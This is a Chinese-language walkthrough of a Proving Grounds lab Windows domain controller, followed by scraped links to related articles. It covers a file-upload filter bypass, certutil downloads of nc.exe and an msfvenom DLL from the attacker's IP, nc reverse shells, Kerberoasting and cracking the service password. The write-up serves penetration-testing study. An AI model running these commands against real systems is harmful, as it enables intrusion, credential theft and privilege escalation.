namp 
nmap -p- -A -sS -T4 192.168.200.187

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 00:24 UTC

Stats: 0:02:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan

NSE Timing: About 98.45% done; ETC: 00:26 (0:00:00 remaining)

Nmap scan report for 192.168.200.187

Host is up (0.071s latency).

Not shown: 65514 filtered tcp ports (no-response)

PORT      STATE SERVICE       VERSION

53/tcp    open  domain        Simple DNS Plus

80/tcp    open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)

|_http-title: Access The Event

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7

88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-23 00:26:00Z)

135/tcp   open  msrpc         Microsoft Windows RPC

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)

445/tcp   open  microsoft-ds?

464/tcp   open  kpasswd5?

593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp   open  tcpwrapped

3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)

3269/tcp  open  tcpwrapped

5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

9389/tcp  open  mc-nmf        .NET Message Framing

49666/tcp open  msrpc         Microsoft Windows RPC

49667/tcp open  msrpc         Microsoft Windows RPC

49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

49674/tcp open  msrpc         Microsoft Windows RPC

49675/tcp open  msrpc         Microsoft Windows RPC

49699/tcp open  msrpc         Microsoft Windows RPC

49738/tcp open  msrpc         Microsoft Windows RPC

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

OS fingerprint not ideal because: Missing a closed TCP port so results incomplete

No OS matches for host

Network Distance: 4 hops

Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-time:

|   date: 2024-12-23T00:26:57

|_  start_date: N/A

| smb2-security-mode:

|   3:1:1:

|_    Message signing enabled and required

TRACEROUTE (using port 80/tcp)

HOP RTT      ADDRESS

1   70.57 ms 192.168.45.1

2   70.55 ms 192.168.45.254

3   71.24 ms 192.168.251.1

4   71.36 ms 192.168.200.187

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 191.49 seconds

观察端口开放情况 发现53 和 88两个端口都开着 可以确认是一台域控服务器

访问80端口



扫描网站

发现forms 目录



uploads目录



尝试给他发送邮件 发现报错 Error: Unable to load the "PHP Email Form" Library!

还发现一个测试点



他存在文件扩展名检测

我们抓包 将shell.php 改成shell.php:.jpg 上传实现绕过



发现我们上传成功 但是内容为0kb



我们要进行追加操作



发现成功



那么接下来尝试反弹shell

certutil -urlcache -split -f http://192.168.45.250/nc.exe nc.exe 下载nc.exe

nc -e cmd 192.168.45.250 80反弹shell

进入提权环节

继续搜集一下信息

ldap协议发现没啥东西

然后就不太会了

看wp

先用这个脚本 获取域环境下的所有spn

https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1?source=post_page-----b95d3146cfe9--------------------------------



发现了mssql的spn

指定请求该spn的tgs

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'

将tgs导出

wp用的是这个脚本

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1?source=post_page-----b95d3146cfe9--------------------------------

这个命令.\Invoke-Kerberoast.ps1

但我发现我运行之后没反应

经过搜索我发现一个这样用

import-module ./Invoke-Kerberoast.ps1

Invoke-Kerberoast -OutputFormat Hashcat | fl

哈希出来了

那么接下来我们要做的就是爆破哈希值 得到mssql这个账户的密码

john st --wordlist=/root/Desktop/fuzz/rockyou.txt/rockyou.txt

爆破成功 trustno1



尝试拿shell evil-winrm -u svc_mssql -p trustno1 -i 192.168.200.187



发现报错

再试另一个

impacket-wmiexec access/svc_mssql:trustno1@192.168.200.187



tmd 也不行 服了

不拿shell了 看看有无共享文件

crackmapexec smb 192.168.200.187 -u svc_mssql -d access.offsec -p "trustno1" --shares

再上传一个脚本

import-module .\Invoke-RunasCs.ps1导入脚本

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami" 执行命令 这个类似于sudo



执行成功

执行反弹shll

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\xampp\htdocs\uploads\nc.exe -e cmd 192.168.45.250 135"

反弹成功



终于拿到第一个flag了

发现SeChangeNotifyPrivilege 权限 可以提权



用这个

https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public?source=post_page-----b95d3146cfe9--------------------------------

现在我们再c盘有可写权限

现在我们用dll劫持来进行提权

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll

靶机上执行

certutil -urlcache -split -f "http://192.168.45.250:88/tzres.dll" C:\Windows\System32\wbem\tzres.dll

再执行systeminfo

发现我失败了 没反应

但是wp成功了

不知道除了啥问题 估计是靶场有些小问题

理论上到这一步就提权成功了

Access pg walkthrough Intermediate window域渗透的更多相关文章

  1. 初级AD域渗透系列

      net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admi ...

  2. Metasploit域渗透测试全程实录(终结篇)

    本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里.于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴 ...

  3. 域渗透基础之NTLM认证协议

    域渗透基础的两个认证协议ntlm和Kerberos协议是必须总结的~ 这篇简单总结下ntlm协议 晚上写下kerberos 0x01 NTLM简介 NTLM使用在Windows NT和Windows ...

  4. 域渗透:SPN(ServicePrincipal Names)的利用

    SPN 简介:服务主体名称(SPN:ServicePrincipal Names)是服务实例(可以理解为一个服务,比如 HTTP.MSSQL)的唯一标识符.Kerberos 身份验证使用 SPN 将服 ...

  5. 域渗透复盘(安洵CTF线下)

    复盘线下域渗透环境Write Up 0x01 外网web到DMZ进域 外网web入口 joomla应用   192.168.0.5 反序列化打下来 GET /index.php HTTP/1.1 Ho ...

  6. AD域渗透总结

    域渗透总结 学习并做了一段时间域网络渗透,给我直观的感受就是思路问题和耐心,这个不像技术研究,需要对一个点进行研究,而是遇到问题后要从多个方面思考,寻找"捷径"思路,只要思路正确, ...

  7. 内网域渗透之MS14-068复现(CVE-2014-6324)

    在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...

  8. 内网域渗透之MS14-068复现

    在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...

  9. 域渗透-Kerberos身份验证流程

    域渗透-Kerberos身份验证流程 Kerberos协议框架 在 Kerberos 协议中主要是有三个角色的存在: 1. 访问服务的 Client: 2. 提供服务的 Server: 3.KDC(K ...

  10. 域渗透之通过DCSync获取权限并制作黄金票据

    环境背景 账号: admin 没有域管权限 admin02 有域管权限 administrator 有域管权限 模拟渗透过程: 利用任意方法已经登录到client1(Windows 7),在clien ...

随机推荐

  1. 【Playwright + Python】系列(十)利用 Playwright 完美处理 Dialogs 对话框

    哈喽,大家好,我是六哥!今天我来给大家分享一下如何使用playwight处理Dialogs对话框,面向对象为功能测试及零基础小白,这里我尽量用大白话的方式举例讲解,力求所有人都能看懂,建议大家先**收 ...

  2. dephi winspy Demo

    在spy+中未找到这样的功能 有个隐藏窗口的进程,相让窗口显示出来,虽然可以找到进程ID,然后再逐步找到主窗口句柄,但又没句柄发各种消息的软件. 计得以前有个窗口精灵之类的,网上找了很多,要么没有此功 ...

  3. LLM应用实战: 给个公司简称,输出公司全称

    1.背景 本qiang~本周在处理手头项目工作的时候,遇到了一个问题,就是友方提供了一个公司名称列表(量不小~,因此无法人工处理),且该公司名称列表均为简称,需要与库中的全称做一个映射匹配. 看似简单 ...

  4. json编码格式化美化

    有时候你想存储一个json到文件中,然后让别人调用或者读取或者作为临时存储,诸如此类. 但是php json_encode后数据是压缩的没有格式化,导致读起来有点费劲. 所以你可以这样(php 5.4 ...

  5. VulnHub-Sick0s1.1解法二shellshock漏洞

    免责声明 本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力.请在合法合规的前提下使用本文中提供的任何技术.方法或工具.如果您选择使用本博客中的任何信息进行非法活动,您将独自 ...

  6. commons.dbutils1.2介绍及使用

    一.结构介绍 高层结构图: wrappers包: handlers包(部分): 二.功能介绍 commons.dbutils是一个对JDBC操作进行封装的类集,其有如下几个优点: (1)没有可能的资源 ...

  7. 轻松使用线程: 不共享有时是最好的——利用 ThreadLocal 提高可伸缩性

    Brian Goetz (brian@quiotix.com), 软件顾问 简介: ThreadLocal 类是悄悄地出现在 Java 平台版本 1.2 中的.虽然支持线程局部变量早就是许多线程工具( ...

  8. 使用mvn 将 pom文件推送到私服

    1.业务场景 现在我有一个 *.pom文件 需要上传到私服. 比如 spring-cloud-dependencies-2021.0.9.pom 这个时候可以使用命令将这个文件传到私服. 2.上传脚本 ...

  9. 【Android】谷歌应用关机闹钟 PowerOffAlarm 源码分析,并实现定时开、关机

    前言 RTC RTC 即实时时钟(Real-Time Clock),主要是功能有: 时间保持:RTC可以在断电的时候,仍然保持计时功能,保证时间的连续性 时间显示与设置:RTC可以向系统提供年.月.日 ...

  10. 史上最牛X的微信公众号!

    今天给大家推荐一个最牛逼的微信公众号,专注分享技术干货,包括但不限于Java,HTML,JavaScript,MySQL,Redis,Windows,Linux,Spring,SpringBoot,V ...